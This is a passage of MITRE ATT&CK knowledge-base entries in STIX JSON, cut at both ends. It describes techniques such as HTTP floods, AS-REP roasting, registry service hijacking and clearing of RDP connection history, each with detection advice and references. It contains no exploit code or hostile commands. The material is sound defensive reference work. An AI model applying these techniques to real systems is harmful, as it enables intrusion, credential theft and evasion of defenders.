"https://isc.sans.edu/forums/diary/BankerGoogleChromeExtensiontargetingBrazil/22722/"}, {"source_name": "Browser Adrozek", "description": "Microsoft Threat Intelligence. (2020, December 10). Widespread malware campaign seeks to silently inject ads into search results, affects multiple browsers. Retrieved February 26, 2024.", "url": "https://www.microsoft.com/en-us/security/blog/2020/12/10/widespread-malware-campaign-seeks-to-silently-inject-ads-into-search-results-affects-multiple-browsers/"}, {"source_name": "Browers FriarFox", "description": "Raggi, Michael. Proofpoint Threat Research Team. (2021, February 25). TA413 Leverages New FriarFox Browser Extension to Target the Gmail Accounts of Global Tibetan Organizations. Retrieved February 26, 2024.", "url": "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global"}, {"source_name": "Stantinko Botnet", "description": "Vachon, F., Faou, M. (2017, July 20). Stantinko: A massive adware campaign operating covertly since 2012. Retrieved November 16, 2017.", "url": "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/"}, {"source_name": "Wikipedia Browser Extension", "description": "Wikipedia. (2017, October 8). Browser Extension. Retrieved January 11, 2018.", "url": "https://en.wikipedia.org/wiki/Browser_extension"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Service Exhaustion Flood", "description": "Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.\n\nOne example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it. This flood relies on raw volume to accomplish the objective, exhausting any of the various resources required by the victim software to provide the service.(Citation: Cloudflare HTTPflood)\n\nAnother variation, known as a SSL renegotiation attack, takes advantage of a protocol feature in SSL/TLS. The SSL/TLS protocol suite includes mechanisms for the client and server to agree on an encryption algorithm to use for subsequent secure connections. If SSL renegotiation is enabled, a request can be made for renegotiation of the crypto algorithm. In a renegotiation attack, the adversary establishes a SSL/TLS connection and then proceeds to make a series of renegotiation requests. Because the cryptographic renegotiation has a meaningful cost in computation cycles, this can cause an impact to the availability of the service when done in volume.(Citation: Arbor SSLDoS April 2012)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.\n\nIn addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.\n\nExternally monitor the availability of services that may be targeted by an Endpoint DoS.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Azure AD", "Office 365", "SaaS", "IaaS", "Linux", "macOS", "Google Workspace"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_impact_type": ["Availability"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", "created": "2020-02-20T15:31:43.613Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1499/002", "external_id": "T1499.002"}, {"source_name": "Arbor SSLDoS April 2012", "description": "ASERT Team, Netscout Arbor. (2012, April 24). DDoS Attacks on SSL: Something Old, Something New. Retrieved April 22, 2019.", "url": "https://www.netscout.com/blog/asert/ddos-attacks-ssl-something-old-something-new"}, {"source_name": "Cisco DoSdetectNetflow", "description": "Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow. Retrieved April 25, 2019.", "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf"}, {"source_name": "Cloudflare HTTPflood", "description": "Cloudflare. (n.d.). What is an HTTP flood DDoS attack?. Retrieved April 22, 2019.", "url": "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/"}, {"source_name": "Arbor AnnualDoSreport Jan 2018", "description": "Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide Infrastructure Security Report. Retrieved April 22, 2019.", "url": "https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Compromise Hardware Supply Chain", "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "initial-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--39131305-9282-45e4-ac3b-591d2d4fc3ef", "created": "2020-03-11T14:28:40.064Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1195/003", "external_id": "T1195.003"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T16:01:07.538Z", "name": "Native API", "description": "Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nAdversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.\n\nNative API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Gordon Long, Box, Inc., @ethicalhax", "Stefan Kanthak", "Tristan Madani (Cybereason)"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "macOS", "Linux"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", "created": "2017-05-31T21:31:17.472Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1106", "external_id": "T1106"}, {"source_name": "MACOS Cocoa", "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020.", "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1"}, {"source_name": "Apple Core Services", "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020.", "url": "https://developer.apple.com/documentation/coreservices"}, {"source_name": "macOS Foundation", "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020.", "url": "https://developer.apple.com/documentation/foundation"}, {"source_name": "OutFlank System Calls", "description": "de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.", "url": "https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/"}, {"source_name": "Redops Syscalls", "description": "Feichter, D. (2023, June 30). Direct Syscalls vs Indirect Syscalls. Retrieved September 27, 2023.", "url": "https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls"}, {"source_name": "GNU Fork", "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.", "url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html"}, {"source_name": "CyberBit System Calls", "description": "Gavriel, H. (2018, November 27). Malware Mitigation when Direct System Calls are Used. Retrieved September 29, 2021.", "url": "https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"}, {"source_name": "GLIBC", "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.", "url": "https://www.gnu.org/software/libc/"}, {"source_name": "LIBC", "description": "Kerrisk, M. (2016, December 12). libc(7) \u2014 Linux manual page. Retrieved June 25, 2020.", "url": "https://man7.org/linux/man-pages//man7/libc.7.html"}, {"source_name": "Linux Kernel API", "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.", "url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html"}, {"source_name": "MDSec System Calls", "description": "MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.", "url": "https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/"}, {"source_name": "Microsoft CreateProcess", "description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.", "url": "http://msdn.microsoft.com/en-us/library/ms682425"}, {"source_name": "Microsoft Win32", "description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020.", "url": "https://docs.microsoft.com/en-us/windows/win32/api/"}, {"source_name": "Microsoft NET", "description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.", "url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework"}, {"source_name": "NT API Windows", "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020.", "url": "https://undocumented.ntinternals.net/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-09-08T18:05:28.311Z", "name": "Clear Network Connection History and Configurations", "description": "Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.\n\nNetwork connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):\n\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\n\nWindows may also store information about recent RDP connections in files such as C:\\Users\\\\%username%\\Documents\\Default.rdp and `C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Terminal\nServer Client\\Cache\\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)\n\nMalicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["CrowdStrike Falcon OverWatch"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3975dbb5-0e1e-4f5b-bae1-cf2ab84b46dc", "created": "2022-06-15T18:00:04.219Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/007", "external_id": "T1070.007"}, {"source_name": "FreeDesktop Journal", "description": "freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.", "url": "https://www.freedesktop.org/software/systemd/man/systemd-journald.service.html"}, {"source_name": "Microsoft RDP Removal", "description": "Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.", "url": "https://docs.microsoft.com/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer"}, {"source_name": "Moran RDPieces", "description": "Moran, B. (2020, November 18). Putting Together the RDPieces. Retrieved October 17, 2022.", "url": "https://www.osdfcon.org/presentations/2020/Brian-Moran_Putting-Together-the-RDPieces.pdf"}, {"source_name": "Apple Culprit Access", "description": "rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.", "url": "https://discussions.apple.com/thread/3991574"}, {"source_name": "Apple Unified Log Analysis Remote Login and Screen Sharing", "description": "Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] \u2013 Working From Home? Remote Logins. Retrieved August 19, 2021.", "url": "https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-06-07T19:23:33.039Z", "name": "AS-REP Roasting", "description": "Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) \n\nPreauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user\u2019s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user\u2019s password.(Citation: Microsoft Kerberos Preauth 2014)\n\nFor each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) \n\nAn account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)\n\nCracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Yossi Nisani, Cymptom", "James Dunn, @jamdunnDFW, EY", "Swapnil Kumbhar", "Jacques Pluviose, @Jacqueswildy_IT", "Dan Nutting, @KerberToast"], "x_mitre_detection": "Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "x_mitre_system_requirements": ["Valid domain account"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b", "created": "2020-08-24T13:43:00.028Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1558/004", "external_id": "T1558.004"}, {"source_name": "Harmj0y Roasting AS-REPs Jan 2017", "description": "HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August 24, 2020.", "url": "http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/"}, {"source_name": "Microsoft Kerberos Preauth 2014", "description": "Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.", "url": "https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx"}, {"source_name": "Stealthbits Cracking AS-REP Roasting Jun 2019", "description": "Jeff Warren. (2019, June 27). Cracking Active Directory Passwords with AS-REP Roasting. Retrieved August 24, 2020.", "url": "https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/"}, {"source_name": "SANS Attacking Kerberos Nov 2014", "description": "Medin, T. (2014, November). Attacking Kerberos - Kicking the Guard Dog of Hades. Retrieved March 22, 2018.", "url": "https://redsiege.com/kerberoast-slides"}, {"source_name": "AdSecurity Cracking Kerberos Dec 2015", "description": "Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets Using Kerberoast \u2013 Exploiting Kerberos to Compromise the Active Directory Domain. Retrieved March 22, 2018.", "url": "https://adsecurity.org/?p=2293"}, {"source_name": "Microsoft Detecting Kerberoasting Feb 2018", "description": "Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.", "url": "https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/"}, {"source_name": "Microsoft 4768 TGT 2017", "description": "Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.", "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Service Registry Permissions Weakness", "description": "Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)\n\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n\nAdversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: TrustedSignal Service Failure)(Citation: Twitter Service Recovery Nov 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matthew Demaske, Adaptforward", "Travis Smith, Tripwire"], "x_mitre_detection": "Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "x_mitre_system_requirements": ["Ability to modify service values in the Registry"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--39a130e1-6ab7-434a-8bd2-418e7d9d6427", "created": "2017-05-31T21:30:49.119Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1058", "external_id": "T1058"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/478.html", "external_id": "CAPEC-478"}, {"source_name": "MSDN Registry Key Security", "description": "Microsoft. (n.d.). Registry Key Security and Access Rights. Retrieved March 16, 2017.", "url": "https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx"}, {"source_name": "TrustedSignal Service Failure", "description": "Hull, D. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.", "url": "https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html"}, {"source_name": "Twitter Service Recovery Nov 2017", "description": "The Cyber (@r0wdy_). (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.", "url": "https://twitter.com/r0wdy_/status/936365549553991680"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Virtual Private Server", "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0", "created": "2020-10-01T00:55:17.771Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1584/003", "external_id": "T1584.003"}, {"source_name": "NSA NCSC Turla OilRig", "description": "NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020.", "url": "https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf"}, {"source_name": "ThreatConnect Infrastructure Dec 2020", "description": "ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.", "url": "https://threatconnect.com/blog/infrastructure-research-hunting/"}, {"source_name": "Mandiant SCANdalous Jul 2020", "description": "Stephens, A. (2020, July 13). SCANdalous! (External Detection Using Network Scan Data and Automation). Retrieved October 12, 2021.", "url": "https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation"}, {"source_name": "Koczwara Beacon Hunting Sep 2021", "description": "Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021.", "url": "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-28T15:58:48.119Z", "name": "AutoHotKey & AutoIT", "description": "Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)\n\nAdversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk 